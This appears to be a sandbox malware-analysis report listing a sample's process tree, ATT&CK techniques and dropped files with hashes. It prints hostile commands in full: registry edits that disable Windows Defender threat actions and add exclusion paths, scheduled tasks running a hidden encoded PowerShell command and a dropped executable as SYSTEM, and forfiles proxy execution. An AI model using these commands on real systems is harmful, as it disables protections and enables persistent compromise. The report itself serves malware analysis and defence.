C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:64;"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gLErrmfbC" /SC once /ST 01:25:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gLErrmfbC"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gLErrmfbC"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yfARWRprRqUFWeTGf" /SC once /ST 01:42:42 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\JUrpoUT.exe\" aV /AScbdidub 385118 /S" /V1 /F2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "yfARWRprRqUFWeTGf"2⤵
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe1⤵
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5964 -ip 59641⤵
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding A72D3432818372FEC4460AB2BEAFC9382⤵
-
C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\JUrpoUT.exeC:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\JUrpoUT.exe aV /AScbdidub 385118 /S1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
2Windows Service
2Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
Modify Registry
3Virtualization/Sandbox Evasion
2Impair Defenses
1Disable or Modify System Firewall
1Subvert Trust Controls
1Install Root Certificate
1Credential Access
Unsecured Credentials
5Credentials In Files
4Credentials in Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\AAFIJKKEFilesize
112KB
MD587210e9e528a4ddb09c6b671937c79c6
SHA13c75314714619f5b55e25769e0985d497f0062f2
SHA256eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1
SHA512f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0
-
C:\ProgramData\Are.docxFilesize
11KB
MD5a33e5b189842c5867f46566bdbf7a095
SHA1e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA2565abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
-
C:\ProgramData\freebl3.dllFilesize
669KB
MD5550686c0ee48c386dfcb40199bd076ac
SHA1ee5134da4d3efcb466081fb6197be5e12a5b22ab
SHA256edd043f2005dbd5902fc421eabb9472a7266950c5cbaca34e2d590b17d12f5fa
SHA5120b7f47af883b99f9fbdc08020446b58f2f3fa55292fd9bc78fc967dd35bdd8bd549802722de37668cc89ede61b20359190efbfdf026ae2bdc854f4740a54649e
-
C:\ProgramData\mozglue.dllFilesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
C:\ProgramData\nss3.dllFilesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
C:\Users\Admin\1000017002\1d10cce2fa.exeFilesize
2.3MB
MD5b01d7f06e2f7e336f12494ae8344f00f
SHA18a38b4ed1483dbad020d5964a272472eb9c83d1b
SHA256fb916f56f8610e2cb4b962141fa3bcf09975bed780b889948dc27270ded41613
SHA512b84c8465e2fd14ccb4c7a9c48a9b50b0d88a6b06400e87e0726ac68dbbbad26b285bcb1cafc66b1bbf309b26d801740133d35cd7c0079991f931430a6c5a26ee
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
336B
MD547324047d9df686b6a0c116399132596
SHA1b81a25014beaedc9714e6b66997ef7c35aa57d61
SHA25656e7690be2595d0785345347e46c1263880c4a0d6389375cc86bbe890cce6feb
SHA5121d1e9b5a60febcd5ae486c366ad2d72f9a5bc4bf5c68b69df4759986dc3a23328f4ea132b50f2cd419f7e35ec3a03e85acbd1ffb6f7f90582aa48ad0399a0ee6
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\HistoryFilesize
152KB
MD531d63b34ce08e2855d5e09e1d1a12b63
SHA1c4f3af4d37a88d81d70a56bd96f17f7937cff891
SHA256c6dbee4c33a461ba15368bee92510a21e54a8291632ca6f5a6f9ce64dc04aceb
SHA5127320646409ffe71e39ec433677855fc87da0756eebd93b840b2faf0e339c639cda46ad586be483e47edd98ff5e473d3813bfbf6a3804c53cd2214d719629c735
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesFilesize
20KB
MD5ffbe9dcb0b1242059cb246255afbb04a
SHA15d3b6f2658cee279ed6454934c7da4ae42b6873a
SHA25667bc64c2416a214595eb3482033074a3882eb6afdf868fa25660b9f57f2315bc
SHA5123d6993a69b99608cc062c04ac49c436db511b574152d33c56500145402d0138ae02b5d76e39738438d55cc06a96ee7dac73f2cc5ef2d2fbb0f0dec644541df7f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending ReportsFilesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
524B
MD59c7a27a9a8420d9a3963323f175b4bd5
SHA185ff616e302e2be75bc0cc707563f3d7b4415c68
SHA256293b18efc38e63b5013ce83541097196361e4a078291e7f2d5e2a354568f9196
SHA512709895b1e8b68d6403f8167eb53bf8fa6833b0ea3accdeea953646114b18a92cb35dc0daaa857ec370cd0c44067cd60df343140ea04e0174e2259fe32a62ed3e
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
7KB
MD5db8c4c0b3d165af8505248780a486656
SHA1db267fe0b4d796c6120a69c534ff2c9df4050b34
SHA25616293a0a56cc54dd290c7f0ce323b970a718c894c087a1011f16b1718e8bd1b5
SHA512f6d9ea2cb2e103f7afcdb8fb2756743d2c174c1820c4c8462ca42229c43f172e57ad9b4166e81bf62d905e79383e7d58771e4d5ca02d620752aff0e970c16f33
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesFilesize
16KB
MD53915086d53ea8050bbd6645a6fcc81c3
SHA189ab318fd8c02297d7bb0b25e2da1227bf1275fe
SHA256e0b0ee7b6989e1a39aad9114b788bc1bf9806fd7db35e9276258410e1875714d
SHA512fa24870558a61de365f87c31a94ef8ea060ec049b77698dcdf4fe75888228cb9f28f7671684083913feab34ace2b09a3bea07be0d4708812ddd7dfdb56d8fb56
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local StateFilesize
256KB
MD513fb40c1e14a667be7d1fbce1e0ab307
SHA1d94d656b17f0d72490fdbdfd692e7ccef53cbfb8
SHA2563f90e2bda43f41bc0539643092d3ccac4d771a8788fe3fa50c4c1810e11f2cad
